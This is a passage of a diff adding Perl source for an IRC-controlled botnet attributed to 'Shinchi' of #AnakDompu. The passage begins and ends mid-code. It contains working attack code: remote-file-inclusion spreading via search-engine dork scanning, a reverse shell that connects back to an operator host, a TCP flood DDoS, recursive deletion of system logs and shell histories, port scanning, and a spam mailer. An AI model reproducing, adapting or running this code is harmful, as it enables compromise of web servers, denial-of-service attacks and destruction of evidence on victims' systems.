$vuln"); +my $shellurl="http://".$vuln.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$shellurl); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Spread Mode] 11,10[1AnakDompu] :12 $vuln"); +} + +############################################ +# Moded By Shinchi AnakDompu @Dalnet # +############################################ + +if ($funcarg =~ /^LoadBotPhp\s+(.*)/) { +$vuln = $1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Menjalankan BotPhp] 13,6[1Shinchi]11,10[1Memang]13,6[1Cakep] :4 $vuln"); +my $kalampabot="http://".$vuln.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$kalampabot); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Botphp] 11,10[1DiJalanKan] :12 $vuln"); +} +###################### +# Commands # +###################### + +if ($funcarg =~ /^system/) { +$uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`; + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Info BOT : Server : 14Cannot View :14 1337"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uname -a : 7 $uname"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uptime : 7 $uptime"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Prosses : 7 $processo"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] ID : 7 $id"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Dir : 7 $ownd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] OS : 7 $distro"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Owner : 7 Shinchi Memang Cakep"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Channel : 7 #AnakDompu"); +} + +if ($funcarg =~ /^milw0rm/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]  Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]14 $bug[$x] -3 $ltt[$x]"); + sleep 1; +}} +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Portscan # +###################### + +if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Scanning for open ports on  12".$1." started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Port Yang Terbuka:5 @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Tidak Ada Ports Yang Terbuka."); + } +} + +###################### +# End of Portscan # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Nmap # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] :12 $1 11,10[1PoRt] 12 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Founded 12 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +####################### +# Menghapus Log File # +####################### +if ($funcarg =~ /^hapuslog/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Poses Ini Sangat Lama Tunggu Beberapa Saat"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Semua default log Dan File bash_history Akan Di Hapus"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Sekarang Menghapus Log File Di System"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Selesai Semua Logs TeLaH Di BeRsIhKaN"); + } +############################# +# Akhir Menghapus Log File # +############################# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# MAILER # +###################### +# For mailing use : +# !bro @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Try Sending Mail to :10 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Successfully Sended to :10 $recipient"); +} +###################### +# End of MAILER # +###################### +###################### +# Join And Part # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# TCPFlood # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1TCP DDoS]8,1 13,6[1HaJaR] 10 ".$1.":".$2." Untuk 10 ".$3." detik."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :0,113,6[1TCP DDoS] HaJar SeLeSai 10 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Back Connect # +###################### +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { + $shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); +if ($estatisticas) +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BackConnect] Konek Ke 10 $host:$porta"); +} +} +###################### +#End of Back Connect# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By Shinchi # +# #AnakDompu # +# irc.dal.net # +################################################## +# EExPreSi SCANNER # +###################### +###################################################################### +#################### GOOGLE +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Memulai]8,18,113,6[1Scan]11,10[1Untuk]8,113,6[1Bug]13,1 $bug 9,1DaN10,1 $dork"); +### End of Start Message +# Starting The Search Engine + my @google=&googlet($dork); +# +push(my @tot, @google); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :13Vuln:9,1 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AllTheWeb +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alltheweb=&allthewebt($dork); + my @allweb=&standard($dork); +# +push(my @tot, @alltheweb, @allweb); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]12,1 $dork"); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### LYCOS +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @lylist=&lycos($dork); +push(my @lybyp,@lylist); +# +push(my @tot, @lybyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### Yahoo +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ylist=&yahoo($dork); + my @yalist=&yahooa($dork); + my @yblist=&yahoob($dork); + my @yclist=&yahooc($dork); + my @ydlist=&yahood($dork); + push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist ); +# +push(my @tot, @yahoobypass); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MSN +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mlist=&msn($dork); +push(my @tot, @mlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### SEARCH +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @slist=&search($dork); +push(my @tot, @slist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### FireBall +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @fireball=fireball($dork); +push(my @tot, @fireball); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### UOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ulist=&uol($dork); +push(my @tot, @ulist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 